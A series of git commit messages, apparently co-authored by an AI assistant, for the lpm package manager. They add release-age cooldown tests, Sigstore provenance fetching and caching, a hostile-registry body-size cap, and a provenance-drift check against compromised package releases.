Chunk 3 lands integration coverage: the §11 P3 ship-criteria E2E
tests (`--min-release-age=72h` blocks; `--allow-new` unblocks; global
TOML overrides default; package.json overrides global) and the §12.3
pin-bypass regression.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ss guard

Adds end-to-end coverage for the Phase 46 P3 cooldown surface against
a wiremock-backed mock registry. Closes the integration gap the
reviewer called out at the end of Chunk 2.

New file: `crates/lpm-cli/tests/release_age_p3_ship_criteria.rs` —
300 LOC, 5 subprocess tests.

Harness pattern is lifted from
`crates/lpm-cli/tests/upgrade_phase7_regression.rs`: start a
`wiremock::MockServer`, mount single-package + batch-metadata
endpoints with a controllable `time[VERSION]` field, serve a real
tarball, then spawn `lpm-rs install` with `LPM_REGISTRY_URL` pointing
at the mock and `HOME` scoped to a per-test temp dir (so the tests
never read the developer's `~/.lpm/config.toml`).

Tests (§11 P3 ship criteria):

* `cli_override_72h_blocks_fresh_package` — package published 1h ago,
  manifest disables the check (`minimumReleaseAge: 0`),
  `--min-release-age=72h` re-enables at 72h. Blocks; output renders
  `259200` to prove the CLI value took effect.
* `allow_new_bypasses_cli_override` — same fixture plus
  `--allow-new`. Cooldown does not fire. Proves orthogonality (§8.3,
  D16): the two flags are independent escape hatches.
* `global_config_overrides_default` — package 30 min old, global
  `minimum-release-age-secs = 3600` (1h), no manifest key, no CLI
  flag. Blocks, output renders `3600` but NOT `86400` — proving the
  global layer is what took effect.
* `package_json_overrides_global` — package 30 min old, global = 3600
  (would block), manifest = 60 (1 min, would allow). Cooldown does
  not fire — manifest layer wins.

§12.3 pin-bypass regression:

* `pin_does_not_bypass_cooldown` — explicit-version install
  (`@lpm.dev/acme.widget@1.0.0`), package 1h old, default 24h
  window. Blocks. The v1 plan proposed pin-bypass; v2 rejected it
  per D7 because renovate / dependabot auto-pin PRs would otherwise
  land compromised versions during the detection window (the axios
  attack scenario in §1). This test is the structural guard that
  the rejected behaviour never re-lands.
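
The decision these five tests exercise can be summarised in one predicate. This is a sketch under two assumptions the commit does not spell out: the comparison is a strict "younger than the window", and ages are already expressed in seconds. The function name is hypothetical.

```rust
/// Returns true when the cooldown should block the install.
/// `allow_new` is the blanket bypass; a pinned version is deliberately
/// NOT an input, so pinning cannot bypass the gate.
pub fn cooldown_blocks(age_secs: u64, min_release_age_secs: u64, allow_new: bool) -> bool {
    !allow_new && age_secs < min_release_age_secs
}
```

Under these assumptions a 1h-old package is blocked by a 72h window, passes with `--allow-new`, and a 30-minute-old package passes a 60-second window.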

A shared `Fixture` struct encapsulates the mock-registry + tempdir +
scoped-HOME setup. Assertion helpers `assert_cooldown_blocked` and
`assert_cooldown_not_blocked` check both stdout and stderr (the
cooldown path uses `eprintln!` for warning lines and miette's
`LpmError::Registry` for the final error; both channels can carry
the signal depending on `--json` mode). Panic messages always dump
exit code + stdout + stderr so a failing assertion never leaves the
author guessing.

Behaviourally verified: all 5 tests pass in isolation
(`cargo nextest run -p lpm-cli --test release_age_p3_ship_criteria`).

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
  — 3931 pass / 4 fail. All 4 failures are
  `lpm-task filter::eval::tests::perf_eval_*`, the machine-load-sensitive
  parallel-nextest flakes explicitly carved out in the P3 prompt
  ("never in touched crates"). Chunk 3 touches only lpm-cli; lpm-task
  is untouched. Isolated lpm-cli runs (both the new E2E tests and the
  Chunk 1 unit tests) pass 55/55; lpm-security passes 395/395.

Phase 46 P3 is complete. Ship criteria 1–4 covered end-to-end,
§12.3 pin-bypass regression in place, global-config error surface
enforced by the path-aware loader committed in Chunk 1.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…location

Chunk 1 of the Phase 46 P4 provenance-drift work (§7, §11 P4). Pure
schema scaffolding — no install-pipeline behaviour change yet. The
fetch/cache and the drift comparator land in Chunks 2-3 per the
user-approved refined plan.

Type scaffolding:

* `lpm-registry`: `DistInfo` gains `signatures: Option<Vec<RegistrySignature>>`
  and `attestations: Option<AttestationRef>` (§7.1). Non-breaking:
  `serde(default)` + `skip_serializing_if = "Option::is_none"` keeps
  legacy registry responses (LPM today) round-tripping cleanly. Also
  now derives `Default` so `..Default::default()` works at the two
  test construction sites (install_global.rs, global_phase37_e2e.rs).
* `lpm-registry`: new `RegistrySignature { keyid, sig }` models npm's
  per-key package-signing surface.
* `lpm-registry`: new `AttestationRef { url, provenance }` models
  npm's `dist.attestations` pointer. `provenance` kept as loose
  `serde_json::Value` in Chunk 1; Chunk 2's fetcher types the subset
  it consumes. This isolates schema evolution from the wire surface.
* `lpm-workspace`: `TrustedDependencyBinding` gains
  `provenance_at_approval: Option<ProvenanceSnapshot>` (§6.2 field
  ownership). JSON key is `provenanceAtApproval` matching the plan's
  wire spec. Non-breaking via serde defaults.

Structural change — `ProvenanceSnapshot` relocated:

  `lpm-security/src/triage.rs` → `lpm-workspace/src/lib.rs`

This was forced by the §6.2 wiring:
`TrustedDependencyBinding.provenance_at_approval` must reference the
type, but `lpm-security` already depends on `lpm-workspace`, so the
reverse edge would cycle. `ProvenanceSnapshot` is pure schema
(4 primitive/Option fields, no methods) and fits naturally alongside
`TrustedDependencyBinding`, which is also pure schema. The one
existing caller (`lpm-cli/src/build_state.rs:37`) updated to import
from `lpm_workspace` instead of `lpm_security::triage`. The four
struct-behaviour tests moved with the struct; triage.rs keeps a
pointer comment to where the type now lives.

Test coverage (3943 workspace tests, all pass):

* `lpm-registry`: 5 new tests on DistInfo legacy + npm-shape
  round-trip, empty `signatures` array vs absent-key distinction,
  partial `RegistrySignature` payload tolerance, untyped
  `AttestationRef.provenance` preserves unknown fields.
* `lpm-workspace`: 4 moved ProvenanceSnapshot tests (unchanged
  behavioural contract); 3 new TrustedDependencyBinding tests —
  pre-P4 shape round-trips without emitting `provenanceAtApproval:
  null`, with-provenance round-trip preserves every field, absent-
  provenance marker (`present: false`) preserved for the §7.2
  "provenance dropped" branch.

Forward-compat: existing test-helper construction sites for
`TrustedDependencyBinding` across lpm-workspace / lpm-cli /
approve_builds.rs / build.rs / build_state.rs converted to
`..Default::default()` so future P4 fields don't break the tests.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3943 pass / 0 fail. The `lpm-task
  perf_eval_*` family passed this run as well (machine was idle
  enough); prior chunks exercised the `-j 1` carveout for those,
  they remain the known load-sensitive pattern.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… extraction

CLI-side module that fetches a Sigstore attestation bundle from a
registry's `DistInfo.attestations.url`, parses out the leaf cert,
and extracts the GitHub Actions OIDC identity into a
`ProvenanceSnapshot`. The install-time call site + drift comparator
land in Chunk 3.

Module (`crates/lpm-cli/src/provenance_fetch.rs`, ~670 LOC incl.
tests):

* `fetch_provenance_snapshot(http, cache_root, name, version, attestation_ref)`
  — public API returning `Result<Option<ProvenanceSnapshot>, LpmError>`.
  Explicit three-valued return:
  - `Ok(Some(snap))` — definitive answer (extracted identity OR
    registry-confirmed absence).
  - `Ok(None)` — degraded/unknown (network failure, malformed bundle).
    NEVER cached, so the next install retries. The Chunk 3 drift rule
    will interpret this as "pass, don't drift" per the plan's
    offline-mode contract (§11 P4).
  - `Err(_)` — reserved for genuinely fatal conditions (cache
    directory unwritable).
* Cache primitives: SHA-256 of `name@version` as filename under
  `~/.lpm/cache/metadata/attestations/`; 7-day TTL; corrupt + stale
  + schema-version-mismatched entries all treated as misses; atomic
  write via `.tmp` + rename. Lives under the existing `metadata`
  subtree per the user's Q3 answer — no new `lpm cache clean`
  surface needed.
* Sigstore bundle parser: handles both the standard
  `{verificationMaterial: {x509CertificateChain: ...}}` shape and
  npm's `{attestations: [{bundle: ...}]}` list wrapper.
* Cert SAN extractor: walks the x509 SAN extension via
  `x509-parser = "0.16"` (already in-workspace via `lpm-cert`),
  matches the GitHub Actions OIDC URI pattern
  `https://github.com/<org>/<repo>/.github/workflows/<workflow>@<ref>`,
  emits `(publisher="github:<org>/<repo>", workflow="<path>@<ref>",
  cert_sha256="sha256-<hex>")`. Non-GitHub SANs / missing
  extensions / garbage bytes all return `None` cleanly.
* Defensive limits: 1 MiB max response body (hostile-registry
  defense), 15 s fetch timeout (install-path budget).
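
The cache-miss rules in the list above can be sketched roughly as
follows. This is an illustration only, not the module's code:
`CacheEntry`, `SCHEMA_VERSION`, and `is_usable` are hypothetical
names, and treating a future-dated entry as a miss is an assumption.

```rust
use std::time::{Duration, SystemTime};

/// 7-day TTL, as stated in the commit text.
const CACHE_TTL: Duration = Duration::from_secs(7 * 24 * 60 * 60);
/// Hypothetical schema version; the real value is not given in the text.
const SCHEMA_VERSION: u32 = 1;

/// Hypothetical on-disk entry shape (simplified for the sketch).
struct CacheEntry {
    schema_version: u32,
    written_at: SystemTime,
    present: bool,
}

/// Returns true only when the entry may be served from cache.
/// Schema mismatches and entries past the TTL count as misses.
fn is_usable(entry: &CacheEntry, now: SystemTime) -> bool {
    if entry.schema_version != SCHEMA_VERSION {
        return false;
    }
    match now.duration_since(entry.written_at) {
        Ok(age) => age <= CACHE_TTL,
        // Entry claims to be written in the future: treat as a miss (assumption).
        Err(_) => false,
    }
}
```

A degraded `Ok(None)` result never reaches this path because it is
never written to the cache in the first place.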

Infrastructure:

* `lpm-common/src/paths.rs` gains `LpmRoot::cache_metadata_attestations()`
  — single canonical accessor for the cache path, consumed by
  Chunk 3 when it wires the install gate.
* `crates/lpm-cli/Cargo.toml`: `x509-parser = "0.16"` as regular
  dep, `rcgen = { version = "0.13", features = ["pem"] }` as
  dev-dep (synthetic cert generation for SAN-extractor tests).

Scaffolding: module-level `#![allow(dead_code)]` matching P3
Chunk 1's pattern — the binary doesn't call into the module yet so
clippy flags 17 items as unused. The allow comes off atomically in
Chunk 3 alongside the install-gate wiring.

Test coverage (28 unit tests, all pass):

* 7 `parse_github_actions_uri` tests — happy path, nested workflow
  path, non-GitHub host rejection, missing workflows segment,
  missing ref suffix, missing repo, extra path segment.
* 4 `extract_san_identity` tests — GitHub cert happy path, non-GitHub
  SAN, cert with no SAN, garbage bytes. Certs generated at test time
  via rcgen with deterministic URI SANs.
* 6 `parse_sigstore_bundle` tests — standard shape, npm list wrapper,
  present-but-no-extractable-identity, malformed JSON, missing cert
  chain, non-base64 rawBytes.
* 7 cache tests — write/read round-trip, miss, corrupt file, schema
  version mismatch, stale past TTL, parent-dir creation,
  filename-collision sanity.
* 4 public-API tests — absent-ref shortcut, absent-url shortcut,
  cache-hit skips network (pointed at unreachable URL to prove
  no connection attempted), network-failure returns `None` AND
  does not cache (the critical "don't poison future installs for
  7 days" contract).

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — **3971/3971 pass**, including the full
  `lpm-task filter::eval::tests::perf_eval_*` family (machine idle,
  clean run).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ot post-buffer

Reviewer-flagged blocking defect: the 1 MiB "hostile registry"
defense documented in the Chunk 2 module was ineffective because
`fetch_and_parse` called `response.bytes().await` first (which
buffers the full body into memory) and only then compared
`bytes.len()` against `MAX_BUNDLE_BYTES`. A malicious or broken
registry could therefore still force an oversized allocation before
the check ran — the guard was cosmetic.

Fix: enforce the cap in two stages, so no matter how the body is
framed we never allocate past the cap.

1. **Stage 1 — pre-stream**: if the response declares a
   `Content-Length` greater than `MAX_BUNDLE_BYTES`, reject
   immediately. Dropping the response closes the connection
   without reading a body byte. Cheap early-out for the common
   case where legitimate servers declare truthful lengths.

2. **Stage 2 — mid-stream**: for chunked / undeclared-length
   responses, stream chunks via `response.bytes_stream()` into a
   bounded `Vec`, checking `buf.len() + chunk.len()` BEFORE
   copying. The moment a chunk would push the accumulator past
   the cap, we return `Err(())` — the stream drops, the
   connection closes, and `buf` stays under the limit. A
   hostile 10 MiB body thus never materializes in our heap.

The worst-case allocation is now `MAX_BUNDLE_BYTES + chunk_size`,
where `chunk_size` is hyper's buffer size (typically 8-16 KiB). That
is a fixed bound, whereas the prior failure mode let the registry
dictate the allocation size.
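
A minimal sketch of the two stages, assuming the body arrives as a
sequence of byte chunks. The real code streams from
`response.bytes_stream()`; here a plain iterator stands in for the
stream, and `check_declared_length` / `read_bounded` are hypothetical
names.

```rust
/// 1 MiB cap, as stated in the commit text.
const MAX_BUNDLE_BYTES: usize = 1024 * 1024;

/// Stage 1: reject on the declared length alone, before reading any body.
fn check_declared_length(declared: Option<u64>) -> Result<(), ()> {
    match declared {
        Some(len) if len > MAX_BUNDLE_BYTES as u64 => Err(()),
        _ => Ok(()),
    }
}

/// Stage 2: accumulate chunks, checking the size BEFORE copying each one,
/// so `buf` never grows past the cap.
fn read_bounded<'a, I>(chunks: I) -> Result<Vec<u8>, ()>
where
    I: IntoIterator<Item = &'a [u8]>,
{
    let mut buf = Vec::new();
    for chunk in chunks {
        if buf.len() + chunk.len() > MAX_BUNDLE_BYTES {
            // Returning here drops the iterator, standing in for dropping the stream.
            return Err(());
        }
        buf.extend_from_slice(chunk);
    }
    Ok(buf)
}
```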

Tests (4 new, 32 total in the module):

* `fetch_and_parse_accepts_bundle_under_size_cap` — positive
  baseline via wiremock. If this fails, the streaming plumbing
  itself is broken.
* `fetch_and_parse_rejects_oversized_body` — primary regression
  guard. 2 MiB body (truthful Content-Length) → Stage 1 rejects.
* `fetch_and_parse_rejects_declared_oversized_content_length` —
  Stage 1 specificity. Declared Content-Length of `MAX_BUNDLE_BYTES+1`
  with a tiny 16-byte real body → rejected on the header alone,
  no body bytes consumed.
* `fetch_returns_none_on_oversized_body_and_does_not_cache` —
  public-API flavor. Oversized body propagates through
  `fetch_provenance_snapshot` as `Ok(None)` (degraded), AND the
  rejected response is NOT written to cache (same poisoning
  contract as the network-failure case).

Module docstring + the `fetch_and_parse` doc comment updated to
describe the two-stage enforcement explicitly, so future readers
can see the defense is real rather than inferred from the constant
name.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3975/3975 pass, zero flakes (provenance_fetch
  tests alone: 32/32).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…w-TCP responder

Reviewer-flagged test-harness defect: the Stage-1 regression test
for "reject on declared oversized Content-Length"
(fetch_and_parse_rejects_declared_oversized_content_length) passed
while panicking a wiremock/hyper background thread. Root cause:
the earlier version declared a `Content-Length` of `MAX_BUNDLE_BYTES+1`
while `set_body_bytes(vec![0u8; 16])` emitted only 16 actual body
bytes. That mismatch violates HTTP/1.1 framing, so hyper's response
writer panicked with "payload claims content-length of 16, custom
content-length header claims 1048577". The test assertion still
returned ok because the client saw a transport error — which our
code maps to `Err(())` anyway — but the run left a background
panic in the test output. Passing for the wrong reason.

Fix: drop wiremock/hyper entirely for this specific test and serve
the HTTP response from a raw `tokio::net::TcpListener`. The
responder:

1. Binds to `127.0.0.1:0` (OS-assigned port).
2. Accepts exactly one connection (single-shot — task exits after
   serving, no leak).
3. Reads the request preamble (so the turn-taking looks well-formed
   on the wire).
4. Writes a valid HTTP/1.1 response header block:
     `HTTP/1.1 200 OK`
     `Content-Length: <MAX_BUNDLE_BYTES+1>`
     `Content-Type: application/octet-stream`
     `Connection: close`
5. Closes the connection without writing a single body byte.

Our client's Stage-1 check fires on the declared `Content-Length`
value alone (via `response.content_length()`) and returns `Err(())`
before calling `bytes_stream()`, so the "declared vs actual"
framing discrepancy never surfaces on the client side either —
reqwest never tries to read a body it didn't get. Zero framing
violations anywhere in the test harness, clean stderr under
`--nocapture`.
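
The responder steps can be sketched as below. Note the swap: this
sketch uses the blocking `std::net::TcpListener` on a thread rather
than `tokio::net::TcpListener`, purely to stay dependency-free.
`spawn_oversized_header_responder` is a hypothetical name.

```rust
use std::io::{Read, Write};
use std::net::{SocketAddr, TcpListener};
use std::thread::{self, JoinHandle};

/// 1 MiB cap, as stated in the commit text.
const MAX_BUNDLE_BYTES: u64 = 1024 * 1024;

/// Spawns a single-shot responder that declares an oversized body and then
/// closes the socket without writing any body bytes.
fn spawn_oversized_header_responder() -> std::io::Result<(SocketAddr, JoinHandle<()>)> {
    let listener = TcpListener::bind("127.0.0.1:0")?; // OS-assigned port
    let addr = listener.local_addr()?;
    let handle = thread::spawn(move || {
        // Accept exactly one connection, then exit.
        if let Ok((mut sock, _)) = listener.accept() {
            // Read the request preamble up to the blank line.
            let mut seen = Vec::new();
            let mut byte = [0u8; 1];
            while !seen.ends_with(b"\r\n\r\n") {
                match sock.read(&mut byte) {
                    Ok(1) => seen.push(byte[0]),
                    _ => break,
                }
            }
            let head = format!(
                "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/octet-stream\r\nConnection: close\r\n\r\n",
                MAX_BUNDLE_BYTES + 1
            );
            let _ = sock.write_all(head.as_bytes());
            // `sock` drops here: the connection closes with zero body bytes sent.
        }
    });
    Ok((addr, handle))
}
```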

Verified with `cargo nextest run provenance_fetch --nocapture`:
32/32 in the module pass with no stray panic lines between test
stages. Full workspace gate still 3975/3975.

Production code unchanged — the two-stage body-cap enforcement from
5379ada is already correct; this commit fixes only the test harness
that exercises it.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean (via prior compile)
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3975/3975 pass, zero flakes.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…te-path

Wires the Phase 46 P4 provenance-drift defense end-to-end. After this
commit the full §7.2 loop is live on the fresh-resolution install path:
install-time fetch → snapshot capture → comparator → block-on-drift;
approve-builds → write `provenance_at_approval`; next install compares
candidate version against that reference.

Comparator (lpm-security):

* New `lpm-security/src/provenance.rs` with `DriftVerdict` enum and
  `check_provenance_drift(approved, now) -> DriftVerdict`. Pure
  comparison — no I/O, no config. Maps the §7.2 five-branch table,
  distinguishing outer `None` (degraded fetch / missing approval,
  pass) from inner `present: false` (registry-confirmed absence,
  the axios signal against an approved-present reference).
* 11 unit tests cover every match-table row plus a regression guard
  that degraded-fetch (`now = None`) is distinct from confirmed-
  absent (`now = Some(present: false)`) — the two look similar but
  have opposite verdicts and the comparator must never conflate them.

Write-path (lpm-workspace + approve_builds):

* `TrustedDependencies::approve_with_provenance(name, version,
  integrity, script_hash, provenance)` — new helper that persists
  `provenance_at_approval` on the binding. The existing
  `approve(...)` helper now delegates with `provenance_at_approval:
  None` so Legacy / provenance-agnostic callers remain unchanged.
* `TrustedDependencies::provenance_reference_for_name(name)` —
  returns `(approved_version, &binding)` for any rich entry whose
  binding carries a non-None `provenance_at_approval`. Deliberate
  Chunk-3 simplification: picks the first provenance-bearing entry
  encountered, which is safe because filtering to provenance-
  bearing approvals prevents a legacy axios@1.13.5 entry from
  masking an axios@1.14.0 approval when checking axios@1.14.1.
* All three `approve-builds` call sites — the single-pkg direct
  approve, the `--yes` bulk approve, and the interactive walk —
  switched to `approve_with_provenance(..., blocked.provenance_at_capture
  .clone())`. This closes the round-trip: install-time snapshot →
  `BlockedPackage.provenance_at_capture` → binding's
  `provenance_at_approval` → subsequent install's drift check.

Producer fix (build_state):

* `BlockedSetMetadataEntry` extended with
  `provenance_at_capture: Option<ProvenanceSnapshot>`.
* `compute_blocked_packages_with_metadata` at build_state.rs:432
  now pulls the snapshot from metadata instead of hardcoding
  `None` — fixes the reviewer-flagged producer-side underfill where
  non-drifting packages had no approval-time reference. Every
  blocked package now carries the capture regardless of whether
  its drift check fired.

Install-gate wiring (install.rs):

* New drift-gate block immediately after the P3 cooldown gate,
  gated on `!used_lockfile` (fresh-resolution only; lockfile fast-
  path skips by design — `lpm.lock` locks integrity, not attestation
  identity). `--allow-new` does NOT bypass per D16.
* Short-circuits with zero network cost when the project has no
  rich `trustedDependencies` entries with provenance (pre-P4
  projects, or no approvals at all).
* For each resolved package with a provenance-bearing prior
  approval: extract `DistInfo.attestations` from the resolver's
  TTL cache, fetch the candidate snapshot via Chunk 2's
  `provenance_fetch::fetch_provenance_snapshot`, compare via the
  lpm-security comparator, collect drift offenders.
* `§7.3` UX on block: per-package "@Version — <kind>" lines with
  "last approved: v<VERSION> via <publisher> / <workflow>" and the
  "axios 1.14.1 compromise (March 2026)" footer. Error message
  suggests `lpm approve-builds` to acknowledge the new identity
  (Chunk 4 adds `--ignore-provenance-drift` override flags).
* `build_blocked_set_metadata` at install.rs:2865 extended to also
  fetch provenance per package — this is what populates
  `BlockedSetMetadataEntry.provenance_at_capture` and closes the
  approval-round-trip. Graceful degradation: if `LpmRoot::from_env()`
  fails (HOME unset), the function's "never returns an error"
  contract is preserved and `provenance_at_capture` is `None` for
  every package.

Chunk 2 scaffold removal:

* `#![allow(dead_code)]` on `provenance_fetch` module removed. The
  install-gate call site + `build_blocked_set_metadata` both
  consume the module's public API, so all 17 items are reachable
  from the binary target and clippy is clean without the scaffold.

Test coverage (3986 workspace tests, all pass):

* 11 new `lpm-security::provenance::tests` covering the §7.2 match
  table + degraded-vs-confirmed-absent regression guard.
* Existing `lpm-cli` `provenance_fetch` tests (32) + `lpm-workspace`
  schema tests (9) still pass unchanged — the scaffold removal and
  the helper additions are non-breaking.
* Forward-compat: the one `BlockedSetMetadataEntry` test-helper
  construction site (build_state.rs:1519) uses `..Default::default()`
  so future P4 fields don't force test re-edits.

CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
  --no-fail-fast` — 3986/3986 pass, zero flakes (full
  `lpm-task perf_eval_*` family clean).

Chunk 4 follows with override flags (`--ignore-provenance-drift[-all]`)
+ global-install rejection; Chunk 5 lands the E2E wiremock suite
covering the §11 P4 ship criteria.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ference selector

Two reviewer-flagged defects in 917239c, both now corrected with
dedicated regression guards.

## Finding 1 (critical) — drift comparator flagged legitimate releases

The Chunk 3 comparator compared snapshots via full-struct `==`, which
treated the per-release ref (`refs/tags/v1.14.0` vs `v1.14.1`) and
the per-signing Fulcio leaf cert SHA as part of the identity tuple.
Every legitimate patch bump from the same repo + workflow would have
been classified `IdentityChanged` and hard-blocked.

Fix is a schema split + comparator rewrite:

* `ProvenanceSnapshot.workflow: Option<String>` → two fields:
  * `workflow_path: Option<String>` — `.github/workflows/publish.yml`.
    Stable across releases from the same workflow. Part of the
    drift-check identity tuple.
  * `workflow_ref: Option<String>` — `refs/tags/v1.14.0`. Varies per
    release. Retained for audit / UX ("last approved: v1.14.0 via
    <id> (ref: refs/tags/v1.14.0)") but NOT part of identity.
* `attestation_cert_sha256` similarly excluded from identity (Fulcio
  rotates the leaf per signing). Retained for audit.
* `parse_github_actions_uri` now splits `<path>@<ref>` at the last
  `@` and prepends `.github/workflows/` so `workflow_path` is the
  full canonical path (matches §6.1 wire spec).
* `lpm-security::provenance::check_provenance_drift` gains an
  internal `identity_equal(a, n)` helper that compares ONLY
  `(present, publisher, workflow_path)`, replacing the full-struct
  `==` in the "exact match" arm.
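
A rough sketch of the rewritten comparator, under stated assumptions:
the field types, the `ProvenanceDropped` variant name, and the exact
branch order are hypothetical. Only the identity tuple
`(present, publisher, workflow_path)` and the `NoDrift` /
`IdentityChanged` names come from the text, and rows the text does not
spell out fall through to `IdentityChanged` here as a guess.

```rust
#[derive(Clone, Debug, Default, PartialEq)]
struct ProvenanceSnapshot {
    present: bool,
    publisher: Option<String>,
    workflow_path: Option<String>,
    workflow_ref: Option<String>,            // audit only, not identity
    attestation_cert_sha256: Option<String>, // audit only, not identity
}

#[derive(Debug, PartialEq)]
enum DriftVerdict {
    NoDrift,
    ProvenanceDropped, // hypothetical variant name
    IdentityChanged,
}

/// Compares ONLY the identity tuple; ref and cert SHA are ignored.
fn identity_equal(a: &ProvenanceSnapshot, n: &ProvenanceSnapshot) -> bool {
    a.present == n.present && a.publisher == n.publisher && a.workflow_path == n.workflow_path
}

fn check_provenance_drift(
    approved: Option<&ProvenanceSnapshot>,
    now: Option<&ProvenanceSnapshot>,
) -> DriftVerdict {
    match (approved, now) {
        // Missing approval or degraded fetch: pass.
        (None, _) | (_, None) => DriftVerdict::NoDrift,
        (Some(a), Some(n)) if identity_equal(a, n) => DriftVerdict::NoDrift,
        // Approved with provenance, candidate confirmed absent.
        (Some(a), Some(n)) if a.present && !n.present => DriftVerdict::ProvenanceDropped,
        // Everything else (assumption for rows not described in the text).
        (Some(_), Some(_)) => DriftVerdict::IdentityChanged,
    }
}
```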

Regression guards (3 new, both layers):

* `provenance_fetch::tests::parse_uri_release_bump_changes_ref_but_not_path`
  — v1.14.0 vs v1.14.1 URIs produce the SAME workflow_path and
  DIFFERENT workflow_ref. Parser-level proof.
* `lpm_security::provenance::tests::no_drift_when_only_workflow_ref_differs_between_releases`
  — the primary comparator regression guard. axios v1.14.0 vs
  v1.14.1 with different refs AND different cert SHAs → NoDrift.
* `lpm_security::provenance::tests::no_drift_when_only_cert_sha_differs_across_rotations`
  — secondary guard: identical publisher + workflow_path +
  workflow_ref but different cert SHA → NoDrift. Covers the case
  where the same workflow re-signs (e.g., a republish) without a
  tag change.
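
The parser-level behavior those guards pin down might look like the
sketch below. The tuple return shape and the validation details are
assumptions for illustration; only the split at the last `@`, the
`.github/workflows/` prefix, and the `github:<org>/<repo>` publisher
format come from the text.

```rust
/// Hypothetical return shape: (publisher, workflow_path, workflow_ref).
fn parse_github_actions_uri(uri: &str) -> Option<(String, String, String)> {
    let rest = uri.strip_prefix("https://github.com/")?;
    // Split `<path>@<ref>` at the LAST `@`.
    let (path, git_ref) = rest.rsplit_once('@')?;
    if git_ref.is_empty() {
        return None;
    }
    // Expect `<org>/<repo>/.github/workflows/<workflow>`.
    let (repo_part, workflow) = path.split_once("/.github/workflows/")?;
    let (org, repo) = repo_part.split_once('/')?;
    if org.is_empty() || repo.is_empty() || repo.contains('/') || workflow.is_empty() {
        return None;
    }
    Some((
        format!("github:{}/{}", org, repo),
        // Stable across releases: part of the identity tuple.
        format!(".github/workflows/{}", workflow),
        // Varies per release: audit only.
        git_ref.to_string(),
    ))
}
```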

Updated tests (schema broadening, not semantic change):

* `identity_changed_when_only_workflow_differs` renamed to
  `identity_changed_when_workflow_path_differs` — same repo, same
  release tag, DIFFERENT workflow file (e.g., a PR-triggered
  workflow impersonating the main publish path). `workflow_path` IS
  part of the identity tuple; this remains `IdentityChanged`.
* `identity_changed_when_only_cert_sha_differs` deleted — the old
  assertion was the exact behavior we're fixing. The new
  `no_drift_when_only_cert_sha_differs_across_rotations` test
  encodes the correct post-fix behavior.

## Finding 2 (medium) — non-deterministic reference selector

`provenance_reference_for_name` used `map.iter().find_map(...)` over
a `HashMap`, whose iteration order isn't stable. Impact: the
"last approved: vX" UX line could show different versions across
runs, and when multiple provenance-bearing approvals for the same
package name carried DIFFERENT identities (legitimate publisher
migration, or prior attack + cleanup), the drift VERDICT itself
could flip between runs.

Fix: collect matching entries, pick the lexicographic-max version
string via `max_by(|(v1, _), (v2, _)| v1.cmp(v2))`. Deterministic;
approximates "latest semver" only while every component has the same
digit width (as plain strings, `10.0.0` sorts below `9.0.0`).
Documented simplification — a future phase can tighten to full
semver ordering, but Chunk 3's obligation is determinism first.
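
A simplified sketch of the deterministic selector. It assumes the map
is keyed by `name@version` strings and reduces the binding to a single
optional field; `Binding` here is a stand-in, not the real
`TrustedDependencyBinding`.

```rust
use std::collections::HashMap;

/// Stand-in for the real binding type (simplified for the sketch).
#[derive(Debug, PartialEq)]
struct Binding {
    provenance_at_approval: Option<String>,
}

/// Returns the provenance-bearing entry with the lexicographic-max version.
fn provenance_reference_for_name<'a>(
    map: &'a HashMap<String, Binding>,
    name: &str,
) -> Option<(&'a str, &'a Binding)> {
    map.iter()
        .filter_map(|(key, binding)| {
            // Split at the LAST `@` so scoped names like `@scope/pkg` survive.
            let (n, v) = key.rsplit_once('@')?;
            if n == name && binding.provenance_at_approval.is_some() {
                Some((v, binding))
            } else {
                None
            }
        })
        // Plain string comparison: independent of HashMap iteration order.
        .max_by(|(v1, _), (v2, _)| v1.cmp(v2))
}
```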

7 new selector tests in `lpm-workspace`:

* `provenance_reference_returns_none_for_legacy_variant`
* `provenance_reference_returns_none_for_absent_name`
* `provenance_reference_returns_none_when_no_entries_have_provenance`
* `provenance_reference_returns_single_provenance_bearing_entry`
* `provenance_reference_filters_out_legacy_entries_in_mixed_map` —
  safeguards the Finding-1-related behavior where a legacy binding
  without provenance must NOT mask a newer provenance-bearing one.
